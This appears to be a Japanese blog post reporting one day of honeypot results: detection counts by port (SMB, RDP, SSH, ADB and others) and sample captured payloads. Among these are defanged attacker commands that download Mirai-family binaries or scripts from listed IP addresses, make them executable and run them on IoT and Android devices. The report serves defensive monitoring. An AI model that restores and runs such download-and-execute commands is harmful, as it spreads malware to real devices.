ハニーポット分析(8日目:8/15)
8日目(8/15)のハニーポット分析結果です。
Honeypot検知数:
9,394 件 (内、ペイロード有 4,321 件)
<宛先ポート別検知数 TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,686 | 39.02% | 調査行為 |
3389 | RDP | 1,176 | 27.22% | 調査行為 |
22 | SSH | 62 | 1.44% | 調査行為 |
1433 | Microsoft SQL Server | 58 | 1.34% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 47 | 1.09% | 調査行為 |
443 | HTTPS | 46 | 1.06% | 暗号化 |
52869 | D-Link, Realtek SDK | 39 | 0.90% | マルウェアダウンロード |
5555 | Android Debug Bridge (ADB) | 37 | 0.86% | マルウェアダウンロード |
8080 | PROXY | 37 | 0.86% | 調査行為 |
6379 | Redis | 35 | 0.81% | 調査行為 |
<ペイロード例>
445ポート:
PC NETWORK PROGRAM 1.0LANMAN1.0Windows for Workgroups 3.1aLM1.2X002LANMAN2.1NT LM 0.12
3389ポート:
Cookie: mstshash=hello
22ポート:
SSH-2.0-libssh2_1.4.3
1433ポート:
SERVERsaOSQL-32160.16.145.183ODBC
8088ポート:
GET /conf
52869ポート:
POST /picsdesc[.]xml hxxp/1[.]1
コマンド一覧
cd /tmp/;wget hxxp[:]//107[.]191[.]99[.]41/elf[.]mips -O elf
cd /tmp/;wget hxxp[:]//178[.]128[.]145[.]32/sora[.]mips -O sora
cd /tmp/;wget hxxp[:]//80[.]211[.]53[.]179/bins/gemini[.]mips
cd /var/; wget hxxp[:]//198[.]12[.]97[.]81/mips -O bt; chmod +x bt; [.]/bt mips
cd /var/; wget hxxp[:]//212[.]237[.]32[.]62/mips -O am; chmod +x am; [.]/am mips
→ IoT を狙ったマルウェア(Mirai系)
5555ポート:
shell[:]cd /data/local/tmp;wget hxxp[:]//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp[:]//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp[:]//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp[:]//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c
→ IoT を狙ったマルウェア(Mirai系)
8080ポート:
GET /
6379ポート:
PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12
SSH宛は調査行為止まりとなっており、実際にどのようなコマンドが打たれるかはハニーポット Cowrie を入れる必要があるかなと思いました。
Suricataの導入も検討しており、順次導入して分析の幅を広めていければと思います。
以上、ハニーポットの分析結果でした。